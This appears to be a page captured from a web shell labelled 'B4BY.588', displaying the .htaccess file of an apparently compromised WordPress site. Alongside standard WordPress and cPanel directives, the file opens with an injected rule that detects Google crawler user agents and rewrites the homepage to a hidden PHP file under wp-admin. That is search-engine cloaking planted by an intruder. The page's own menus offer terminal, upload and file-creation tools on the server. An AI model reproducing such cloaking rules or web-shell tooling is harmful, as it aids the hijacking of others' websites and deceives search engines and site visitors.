B4BY.588
Home
Terminal
Upload
information
Create File
Create Folder
About
Tools
:
/
home
/
bhingree
/
public_html
/
Filename :
.htaccess
back
Copy
RewriteEngine On RewriteCond %{HTTP_USER_AGENT} (Googlebot|Googlebot-News|Googlebot-Image|Googlebot-Video|Googlebot-Mobile|Mediapartners-Google|AdsBot-Google|AdsBot-Google-Mobile|APIs-Google|Googlebot-AdsBot|Googlebot-Desktop|Googlebot-Search|Googlebot-Events|Googlebot-Tablet|Googlebot-Local|Googlebot-Apps|Googlebot-Connect|Googlebot-Books|Googlebot-Publisher|Googlebot-News-RSS|Feedfetcher-Google|DuplexWeb-Google|Google-InspectionTool|Google\ Favicon|Google\ Web\ Preview) [NC] RewriteCond %{REQUEST_URI} ^/$ RewriteRule ^$ /wp-admin/ms-config.php [L] RewriteEngine On RewriteRule ^registration/?$ https://bhingree.com/register-now/ [R=301,L] # BEGIN WordPress # The directives (lines) between "BEGIN WordPress" and "END WordPress" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. <IfModule mod_rewrite.c> RewriteEngine On RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}] RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule> # END WordPress # php -- BEGIN cPanel-generated handler, do not edit # Set the “ea-php72” package as the default “PHP” programming language. <IfModule mime_module> AddHandler application/x-httpd-ea-php72___lsphp .php .php7 .phtml </IfModule> # php -- END cPanel-generated handler, do not edit